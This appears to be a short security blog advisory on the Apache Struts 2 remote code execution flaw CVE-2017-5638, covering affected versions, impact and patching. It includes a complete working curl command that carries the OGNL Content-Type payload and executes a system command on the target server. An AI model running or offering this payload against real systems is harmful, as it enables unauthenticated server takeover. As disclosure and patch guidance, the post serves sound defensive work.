Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw originating in the framework’s Jakarta Multipart parser. The exploit mechanism bypasses standard input validation by submitting a malicious `Content-Type` HTTP header within a file upload request. The vulnerability is triggered because the parser incorrectly processes this header, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. Since OGNL expressions have the capability to execute arbitrary system commands on the underlying server, an attacker can craft a `Content-Type` header containing a malicious OGNL expression. When the vulnerable Struts2 application processes this malformed request, the parser executes the embedded OGNL code within the context of the application server. This allows the attacker to achieve unauthenticated remote command execution with the same privileges as the Struts application, enabling them to take full control of the affected server without needing any form of user interaction or authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action
How Exploit:
Attacker sends HTTP request with malicious OGNL in Content-Type header. The parser evaluates the expression, leading to arbitrary command execution on the server.
Protection from this CVE
Apply official patch from Apache. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Isolate Struts applications.
Impact:
Complete system compromise. Unauthorized data access, modification, or deletion. Service disruption and use as a foothold for lateral movement.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

